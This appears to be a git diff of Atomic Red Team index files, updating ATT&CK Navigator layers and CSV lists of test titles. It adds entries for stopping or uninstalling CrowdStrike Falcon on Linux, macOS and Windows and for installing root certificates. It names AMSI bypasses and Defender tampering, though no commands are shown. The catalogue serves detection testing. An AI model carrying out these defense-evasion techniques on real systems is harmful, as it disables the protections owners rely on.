diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json
index 1e10b0c6..bd3c9b9c 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json
@@ -1 +1 @@ -{"version":"2.2","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1002","score":100,"enabled":true},{"techniqueID":"T1005","score":100,"enabled":true},{"techniqueID":"T1009","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1022","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1045","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1063","score":100,"enabled":true},{"techniqueID":"T1064","score":100,"enabled":true},{"techniqueID":"T1065","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1081","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1089","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1099","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1107","score":100,"enabled":true},{"techniqueID":"T11
13","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1139","score":100,"enabled":true},{"techniqueID":"T1141","score":100,"enabled":true},{"techniqueID":"T1142","score":100,"enabled":true},{"techniqueID":"T1144","score":100,"enabled":true},{"techniqueID":"T1145","score":100,"enabled":true},{"techniqueID":"T1146","score":100,"enabled":true},{"techniqueID":"T1147","score":100,"enabled":true},{"techniqueID":"T1148","score":100,"enabled":true},{"techniqueID":"T1150","score":100,"enabled":true},{"techniqueID":"T1151","score":100,"enabled":true},{"techniqueID":"T1152","score":100,"enabled":true},{"techniqueID":"T1153","score":100,"enabled":true},{"techniqueID":"T1154","score":100,"enabled":true},{"techniqueID":"T1155","score":100,"enabled":true},{"techniqueID":"T1156","score":100,"enabled":true},{"techniqueID":"T1158","score":100,"enabled":true},{"techniqueID":"T1159","score":100,"enabled":true},{"techniqueID":"T1160","score":100,"enabled":true},{"techniqueID":"T1163","score":100,"enabled":true},{"techniqueID":"T1164","score":100,"enabled":true},{"techniqueID":"T1165","score":100,"enabled":true},{"techniqueID":"T1166","score":100,"enabled":true},{"techniqueID":"T1168","score":100,"enabled":true},{"techniqueID":"T1169","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1206","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1519","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true}]} \ No newline at end of file +{"version":"2.2","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator 
Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1002","score":100,"enabled":true},{"techniqueID":"T1005","score":100,"enabled":true},{"techniqueID":"T1009","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1022","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1045","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1063","score":100,"enabled":true},{"techniqueID":"T1064","score":100,"enabled":true},{"techniqueID":"T1065","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1081","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1089","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1099","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1107","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1130","score":100,"enabled":true},{"techniqueID":"T1132","sc
ore":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1139","score":100,"enabled":true},{"techniqueID":"T1141","score":100,"enabled":true},{"techniqueID":"T1142","score":100,"enabled":true},{"techniqueID":"T1144","score":100,"enabled":true},{"techniqueID":"T1145","score":100,"enabled":true},{"techniqueID":"T1146","score":100,"enabled":true},{"techniqueID":"T1147","score":100,"enabled":true},{"techniqueID":"T1148","score":100,"enabled":true},{"techniqueID":"T1150","score":100,"enabled":true},{"techniqueID":"T1151","score":100,"enabled":true},{"techniqueID":"T1152","score":100,"enabled":true},{"techniqueID":"T1153","score":100,"enabled":true},{"techniqueID":"T1154","score":100,"enabled":true},{"techniqueID":"T1155","score":100,"enabled":true},{"techniqueID":"T1156","score":100,"enabled":true},{"techniqueID":"T1158","score":100,"enabled":true},{"techniqueID":"T1159","score":100,"enabled":true},{"techniqueID":"T1160","score":100,"enabled":true},{"techniqueID":"T1163","score":100,"enabled":true},{"techniqueID":"T1164","score":100,"enabled":true},{"techniqueID":"T1165","score":100,"enabled":true},{"techniqueID":"T1166","score":100,"enabled":true},{"techniqueID":"T1168","score":100,"enabled":true},{"techniqueID":"T1169","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1206","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1519","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true}]} \ No newline at end of file 
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
index ff6e79b1..ed78347a 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
@@ -1 +1 @@ -{"version":"2.2","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1002","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1004","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1015","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1022","score":100,"enabled":true},{"techniqueID":"T1023","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1028","score":100,"enabled":true},{"techniqueID":"T1031","score":100,"enabled":true},{"techniqueID":"T1032","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1035","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1038","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1042","score":100,"enabled":true},{"techniqueID":"T1044","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1050","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1058","score":100,"enabled":true},{"techniqueID":"T10
60","score":100,"enabled":true},{"techniqueID":"T1062","score":100,"enabled":true},{"techniqueID":"T1063","score":100,"enabled":true},{"techniqueID":"T1064","score":100,"enabled":true},{"techniqueID":"T1065","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1073","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1075","score":100,"enabled":true},{"techniqueID":"T1076","score":100,"enabled":true},{"techniqueID":"T1077","score":100,"enabled":true},{"techniqueID":"T1081","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1084","score":100,"enabled":true},{"techniqueID":"T1085","score":100,"enabled":true},{"techniqueID":"T1086","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1088","score":100,"enabled":true},{"techniqueID":"T1089","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1093","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1096","score":100,"enabled":true},{"techniqueID":"T1097","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1099","score":100,"enabled":true},{"techniqueID":"T1100","score":100,"enabled":true},{"techniqueID":"T1101","score":100,"enabled":true},{"techniqueID":"T1102","score":100,"enabled":true},{"techniqueID":"T1103","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1107","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1117","score"
:100,"enabled":true},{"techniqueID":"T1118","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1121","score":100,"enabled":true},{"techniqueID":"T1122","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1126","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1128","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1138","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1141","score":100,"enabled":true},{"techniqueID":"T1143","score":100,"enabled":true},{"techniqueID":"T1145","score":100,"enabled":true},{"techniqueID":"T1158","score":100,"enabled":true},{"techniqueID":"T1170","score":100,"enabled":true},{"techniqueID":"T1173","score":100,"enabled":true},{"techniqueID":"T1174","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1179","score":100,"enabled":true},{"techniqueID":"T1180","score":100,"enabled":true},{"techniqueID":"T1183","score":100,"enabled":true},{"techniqueID":"T1191","score":100,"enabled":true},{"techniqueID":"T1193","score":100,"enabled":true},{"techniqueID":"T1196","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1208","score":100,"enabled":true},{"techniqueID":"T1214","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabl
ed":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1223","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1500","score":100,"enabled":true},{"techniqueID":"T1502","score":100,"enabled":true},{"techniqueID":"T1504","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true}]} \ No newline at end of file +{"version":"2.2","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1002","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1004","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1015","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1022","score":100,"enabled":true},{"techniqueID":"T1023","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1028","score":100,"enabled":true},{"techniqueID":"T1031","score":100,"enabled":true},{"techniqueID":"T1032","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1035","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enable
d":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1038","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1042","score":100,"enabled":true},{"techniqueID":"T1044","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1050","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1058","score":100,"enabled":true},{"techniqueID":"T1060","score":100,"enabled":true},{"techniqueID":"T1062","score":100,"enabled":true},{"techniqueID":"T1063","score":100,"enabled":true},{"techniqueID":"T1064","score":100,"enabled":true},{"techniqueID":"T1065","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1073","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1075","score":100,"enabled":true},{"techniqueID":"T1076","score":100,"enabled":true},{"techniqueID":"T1077","score":100,"enabled":true},{"techniqueID":"T1081","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1084","score":100,"enabled":true},{"techniqueID":"T1085","score":100,"enabled":true},{"techniqueID":"T1086","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1088","score":100,"enabled":true},{"techniqueID":"T1089","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1093","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"
techniqueID":"T1096","score":100,"enabled":true},{"techniqueID":"T1097","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1099","score":100,"enabled":true},{"techniqueID":"T1100","score":100,"enabled":true},{"techniqueID":"T1101","score":100,"enabled":true},{"techniqueID":"T1102","score":100,"enabled":true},{"techniqueID":"T1103","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1107","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1117","score":100,"enabled":true},{"techniqueID":"T1118","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1121","score":100,"enabled":true},{"techniqueID":"T1122","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1126","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1128","score":100,"enabled":true},{"techniqueID":"T1130","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1138","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1141","score":100,"enabled":true},{"techniqueID":"T1143","score":100,"enabled":true},{"techniqueID":"T1145","score":100,"enabled":true},{"techniqueID":"T1158","score":100,"enabled":true},{"techniqueID":"T1170","score":100,"enabled":true},{"techniqueID":"T1173","score":100,"enabled":true},{"techniqueID":"T1174","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1179","score":100,"enabled":true},{"techniqueID
":"T1180","score":100,"enabled":true},{"techniqueID":"T1183","score":100,"enabled":true},{"techniqueID":"T1191","score":100,"enabled":true},{"techniqueID":"T1193","score":100,"enabled":true},{"techniqueID":"T1196","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1208","score":100,"enabled":true},{"techniqueID":"T1214","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1223","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1500","score":100,"enabled":true},{"techniqueID":"T1502","score":100,"enabled":true},{"techniqueID":"T1504","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 799e6747..15aa8804 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -121,21 +121,24 @@ defense-evasion,T1089,Disabling Security Tools,1,Disable iptables firewall
 defense-evasion,T1089,Disabling Security Tools,2,Disable syslog
 defense-evasion,T1089,Disabling Security Tools,3,Disable Cb Response
 defense-evasion,T1089,Disabling Security Tools,4,Disable SELinux
-defense-evasion,T1089,Disabling Security Tools,5,Disable Carbon Black Response
-defense-evasion,T1089,Disabling Security Tools,6,Disable LittleSnitch
-defense-evasion,T1089,Disabling Security Tools,7,Disable OpenDNS Umbrella
-defense-evasion,T1089,Disabling Security Tools,8,Unload Sysmon Filter Driver
-defense-evasion,T1089,Disabling Security Tools,9,Disable Windows IIS HTTP Logging
-defense-evasion,T1089,Disabling Security Tools,10,Uninstall Sysmon
-defense-evasion,T1089,Disabling Security Tools,11,AMSI Bypass - AMSI InitFailed
-defense-evasion,T1089,Disabling Security Tools,12,AMSI Bypass - Remove AMSI Provider Reg Key
-defense-evasion,T1089,Disabling Security Tools,13,Disable Arbitrary Security Windows Service
-defense-evasion,T1089,Disabling Security Tools,14,Tamper with Windows Defender ATP PowerShell
-defense-evasion,T1089,Disabling Security Tools,15,Tamper with Windows Defender Command Prompt
-defense-evasion,T1089,Disabling Security Tools,16,Tamper with Windows Defender Registry
-defense-evasion,T1089,Disabling Security Tools,17,Disable Microft Office Security Features
-defense-evasion,T1089,Disabling Security Tools,18,Remove Windows Defender Definition Files
-defense-evasion,T1089,Disabling Security Tools,19,Stop and Remove Arbitrary Security Windows Service
+defense-evasion,T1089,Disabling Security Tools,5,Stop Crowdstrike Falcon on Linux
+defense-evasion,T1089,Disabling Security Tools,6,Disable Carbon Black Response
+defense-evasion,T1089,Disabling Security Tools,7,Disable LittleSnitch
+defense-evasion,T1089,Disabling Security Tools,8,Disable OpenDNS Umbrella
+defense-evasion,T1089,Disabling Security Tools,9,Stop and unload Crowdstrike Falcon on macOS
+defense-evasion,T1089,Disabling Security Tools,10,Unload Sysmon Filter Driver
+defense-evasion,T1089,Disabling Security Tools,11,Disable Windows IIS HTTP Logging
+defense-evasion,T1089,Disabling Security Tools,12,Uninstall Sysmon
+defense-evasion,T1089,Disabling Security Tools,13,AMSI Bypass - AMSI InitFailed
+defense-evasion,T1089,Disabling Security Tools,14,AMSI Bypass - Remove AMSI Provider Reg Key
+defense-evasion,T1089,Disabling Security Tools,15,Disable Arbitrary Security Windows Service
+defense-evasion,T1089,Disabling Security Tools,16,Tamper with Windows Defender ATP PowerShell
+defense-evasion,T1089,Disabling Security Tools,17,Tamper with Windows Defender Command Prompt
+defense-evasion,T1089,Disabling Security Tools,18,Tamper with Windows Defender Registry
+defense-evasion,T1089,Disabling Security Tools,19,Disable Microft Office Security Features
+defense-evasion,T1089,Disabling Security Tools,20,Remove Windows Defender Definition Files
+defense-evasion,T1089,Disabling Security Tools,21,Stop and Remove Arbitrary Security Windows Service
+defense-evasion,T1089,Disabling Security Tools,22,Uninstall Crowdstrike Falcon on Windows
 defense-evasion,T1107,File Deletion,1,Delete a single file - Linux/macOS
 defense-evasion,T1107,File Deletion,2,Delete an entire folder - Linux/macOS
 defense-evasion,T1107,File Deletion,3,Overwrite and delete a file with shred
@@ -184,6 +187,9 @@ defense-evasion,T1070,Indicator Removal on Host,7,Delete System Logs Using Clear
 defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe
 defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe
 defense-evasion,T1130,Install Root Certificate,1,Install root CA on CentOS/RHEL
+defense-evasion,T1130,Install Root Certificate,2,Install root CA on Debian/Ubuntu
+defense-evasion,T1130,Install Root Certificate,3,Install root CA on macOS
+defense-evasion,T1130,Install Root Certificate,4,Install root CA on Windows
 defense-evasion,T1118,InstallUtil,1,CheckIfInstallable method call
 defense-evasion,T1118,InstallUtil,2,InstallHelper method call
 defense-evasion,T1118,InstallUtil,3,InstallUtil class constructor method call
@@ -407,7 +413,7 @@ discovery,T1082,System Information Discovery,5,Linux VM Check via Kernel Modules
 discovery,T1082,System Information Discovery,6,Hostname Discovery (Windows)
 discovery,T1082,System Information Discovery,7,Hostname Discovery
 discovery,T1082,System Information Discovery,8,Windows MachineGUID Discovery
-discovery,T1016,System Network Configuration Discovery,1,System Network Configuration Discovery
+discovery,T1016,System Network Configuration Discovery,1,System Network Configuration Discovery on Windows
 discovery,T1016,System Network Configuration Discovery,2,List Windows Firewall Rules
 discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery
 discovery,T1016,System Network Configuration Discovery,4,System Network Configuration Discovery (TrickBot Style)
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index dc5b1e69..0169eb23 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -46,7 +46,6 @@ discovery,T1069,Permission Groups Discovery,1,Permission Groups Discovery
 discovery,T1057,Process Discovery,1,Process Discovery - ps
 discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix
 discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep
-discovery,T1082,System Information Discovery,2,System Information Discovery
 discovery,T1082,System Information Discovery,3,List OS Information
 discovery,T1082,System Information Discovery,4,Linux VM Check via Hardware
 discovery,T1082,System Information Discovery,5,Linux VM Check via Kernel Modules
@@ -72,6 +71,7 @@ defense-evasion,T1089,Disabling Security Tools,1,Disable iptables firewall
 defense-evasion,T1089,Disabling Security Tools,2,Disable syslog
 defense-evasion,T1089,Disabling Security Tools,3,Disable Cb Response
 defense-evasion,T1089,Disabling Security Tools,4,Disable SELinux
+defense-evasion,T1089,Disabling Security Tools,5,Stop Crowdstrike Falcon on Linux
 defense-evasion,T1107,File Deletion,1,Delete a single file - Linux/macOS
 defense-evasion,T1107,File Deletion,2,Delete an entire folder - Linux/macOS
 defense-evasion,T1107,File Deletion,3,Overwrite and delete a file with shred
@@ -92,6 +92,7 @@ defense-evasion,T1070,Indicator Removal on Host,3,rm -rf
 defense-evasion,T1070,Indicator Removal on Host,4,Overwrite Linux Mail Spool
 defense-evasion,T1070,Indicator Removal on Host,5,Overwrite Linux Log
 defense-evasion,T1130,Install Root Certificate,1,Install root CA on CentOS/RHEL
+defense-evasion,T1130,Install Root Certificate,2,Install root CA on Debian/Ubuntu
 defense-evasion,T1036,Masquerading,2,Masquerading as Linux crond process.
 defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script
 defense-evasion,T1055,Process Injection,2,Shared Library Injection via /etc/ld.so.preload
diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv
index bfece318..db698cce 100644
--- a/atomics/Indexes/Indexes-CSV/macos-index.csv
+++ b/atomics/Indexes/Indexes-CSV/macos-index.csv
@@ -104,9 +104,10 @@ defense-evasion,T1146,Clear Command History,3,Clear Bash history (cat dev/null)
 defense-evasion,T1146,Clear Command History,4,Clear Bash history (ln dev/null)
 defense-evasion,T1146,Clear Command History,6,Clear history of a bunch of shells
 defense-evasion,T1090,Connection Proxy,1,Connection Proxy
-defense-evasion,T1089,Disabling Security Tools,5,Disable Carbon Black Response
-defense-evasion,T1089,Disabling Security Tools,6,Disable LittleSnitch
-defense-evasion,T1089,Disabling Security Tools,7,Disable OpenDNS Umbrella
+defense-evasion,T1089,Disabling Security Tools,6,Disable Carbon Black Response
+defense-evasion,T1089,Disabling Security Tools,7,Disable LittleSnitch
+defense-evasion,T1089,Disabling Security Tools,8,Disable OpenDNS Umbrella
+defense-evasion,T1089,Disabling Security Tools,9,Stop and unload Crowdstrike Falcon on macOS
 defense-evasion,T1107,File Deletion,1,Delete a single file - Linux/macOS
 defense-evasion,T1107,File Deletion,2,Delete an entire folder - Linux/macOS
 defense-evasion,T1222,File and Directory Permissions Modification,4,chmod - Change file or folder mode (numeric mode)
@@ -128,6 +129,7 @@ defense-evasion,T1158,Hidden Files and Directories,6,Hide a Directory
 defense-evasion,T1158,Hidden Files and Directories,7,Show all hidden files
 defense-evasion,T1147,Hidden Users,1,Hidden Users
 defense-evasion,T1070,Indicator Removal on Host,3,rm -rf
+defense-evasion,T1130,Install Root Certificate,3,Install root CA on macOS
 defense-evasion,T1152,Launchctl,1,Launchctl
 defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script
 defense-evasion,T1150,Plist Modification,1,Plist Modification
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 03eaa6e8..55498cb1 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
